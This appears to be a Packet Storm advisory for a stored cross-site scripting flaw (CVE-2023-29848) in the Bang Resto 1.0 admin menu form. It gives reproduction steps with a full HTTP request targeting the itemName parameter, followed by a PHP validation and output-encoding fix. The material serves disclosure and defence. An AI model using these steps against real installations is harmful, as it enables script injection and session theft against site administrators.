CVE-2023-29848: Bang Resto 1.0 Cross Site Scripting ≈ Packet Storm

Bang Resto 1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the itemName parameter in the admin/menu.php Add New Menu function.

# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29848

*Steps to Reproduce:*

1. First log in to your admin panel.
2. Then go to the Menu section and click add new menu from group. Your request data will be:

POST /bangresto/admin/menu.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/admin/menu.php
Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
Connection: close

itemName=test&itemPrice=1&menuID=1&addItem=

3. Then use any XSS payload in the "itemName" parameter and click add.
4. You will see an XSS pop up.
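A mitigation sketch for the itemName issue described above, added here as an example and not taken from Bang Resto's code (the page does not show menu.php). The function names validate_menu_item, e and render_menu_row are hypothetical; only the field names itemName, itemPrice and menuID come from the request above. It validates the fields before storage and HTML-encodes every stored value at render time, so rows saved before the fix are also neutralised.

```php
<?php
declare(strict_types=1);

/** Validate the "Add New Menu" form fields before they are stored. */
function validate_menu_item(array $post): array
{
    $name = trim((string)($post['itemName'] ?? ''));
    // Allow-list: letters, digits, spaces and a little punctuation; no markup characters.
    if ($name === '' || strlen($name) > 100
        || !preg_match('/^[\p{L}\p{N} .,\'&()\-]+\z/u', $name)) {
        throw new InvalidArgumentException('invalid itemName');
    }
    $price  = filter_var($post['itemPrice'] ?? null, FILTER_VALIDATE_FLOAT);
    $menuId = filter_var($post['menuID'] ?? null, FILTER_VALIDATE_INT);
    if ($price === false || $price < 0 || $menuId === false || $menuId < 1) {
        throw new InvalidArgumentException('invalid itemPrice or menuID');
    }
    return ['itemName' => $name, 'itemPrice' => $price, 'menuID' => $menuId];
}

/** HTML-encode a value for element content or a quoted attribute. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render one stored item; encoding happens here regardless of how the row was saved. */
function render_menu_row(array $item): string
{
    $price = number_format((float)$item['itemPrice'], 2, '.', '');
    return sprintf('<tr><td>%s</td><td>%s</td></tr>', e((string)$item['itemName']), e($price));
}

// Constructed sample input: one well-formed request and one containing markup.
$samples = [
    ['itemName' => 'Fried Rice (large)', 'itemPrice' => '4.5', 'menuID' => '1'],
    ['itemName' => '<b>Soup</b>', 'itemPrice' => '1', 'menuID' => '1'],
];
foreach ($samples as $post) {
    try {
        echo render_menu_row(validate_menu_item($post)), PHP_EOL;
    } catch (InvalidArgumentException $ex) {
        echo 'rejected: ', $ex->getMessage(), PHP_EOL;
    }
}

// Constructed legacy row stored before validation existed: rendered as inert text.
echo render_menu_row(['itemName' => '<b>Soup</b> & "bread"', 'itemPrice' => 1]), PHP_EOL;
```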

Related news

Bang Resto 1.0 Cross Site Scripting

Bang Resto version 1.0 suffers from a cross site scripting vulnerability.
